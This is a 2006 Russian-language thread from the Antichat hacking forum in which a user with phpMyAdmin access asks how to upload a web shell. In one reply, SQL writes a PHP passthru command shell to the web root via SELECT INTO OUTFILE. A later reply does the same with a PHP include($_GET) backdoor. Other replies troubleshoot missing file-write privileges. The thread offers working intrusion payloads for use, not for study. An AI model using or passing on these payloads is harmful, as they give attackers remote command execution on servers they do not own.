ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Sql запрос для php-myadmin
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql запрос для php-myadmin
  #1  
Старый 12.04.2006, 10:21
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию Sql запрос для php-myadmin
Вообщем столкнулся с такой проблемой. Есть доступ к phpmyadmin но не знаю как залить шелл. Может кто подскажет??
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #2  
Старый 12.04.2006, 10:37
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/svoi/puti/k/saity/shell.php' FROM `shell`;
DROP TABLE `shell`;
 
Ответить с цитированием

  #3  
Старый 12.04.2006, 11:16
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Эх жалко не хватает прав....
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #4  
Старый 12.04.2006, 15:11
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
Цитата:
Эх жалко не хватает прав....
Смотря на что прав не хватает, добавить строку можно к любой другой таблице. Только удалить ее не забудь потом. А если на инто аутфайл или запись, то хуже уже...
 
Ответить с цитированием

  #5  
Старый 12.04.2006, 15:23
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
На инто вот и нету записи.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #6  
Старый 12.04.2006, 16:37
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
SanyaX, Попробуй вот здесьпосмотреть:
http://www.ljplus.ru/img/_/c/_cybermind_/_1.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/__1.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/_2.jpg
http://www.ljplus.ru/img/_/c/_cybermind_/_3.jpg
Вроде бы было что-то про дыры в пхпмайадмин. Да и сама статья не плохая...
 
Ответить с цитированием

  #7  
Старый 15.04.2006, 08:24
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию
Может я тут не в тему, но всёравно подскажу...
Сначало в phpMyAdmin надо куда-то вписать значение <? include($_GET[p]) ?> потом использовать команду SELECT pass INTO OUTFILE 'c:/appserv/www/appserv/user.php' FROM user WHERE login = 'shell'
Думаю значение этого всего объяснять ненадо, вот только не помню как путь прописывать... /www/site/ или \www\site\
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ